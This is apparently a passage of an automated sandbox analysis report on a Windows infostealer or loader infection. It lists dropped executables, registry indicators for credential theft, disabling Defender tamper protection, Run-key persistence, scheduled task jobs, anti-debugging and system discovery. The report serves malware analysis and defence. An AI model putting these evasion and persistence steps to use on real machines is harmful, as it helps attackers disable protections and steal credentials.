N/A N/A C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\rvhetm\ktgtc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\781a56e4da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110370101\\781a56e4da.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1109dfe086.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110380101\\1109dfe086.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e8635ad464.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\e8635ad464.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\351688018b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110350101\\351688018b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6dde3a1917.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110360101\\6dde3a1917.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\rvhetm\ktgtc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
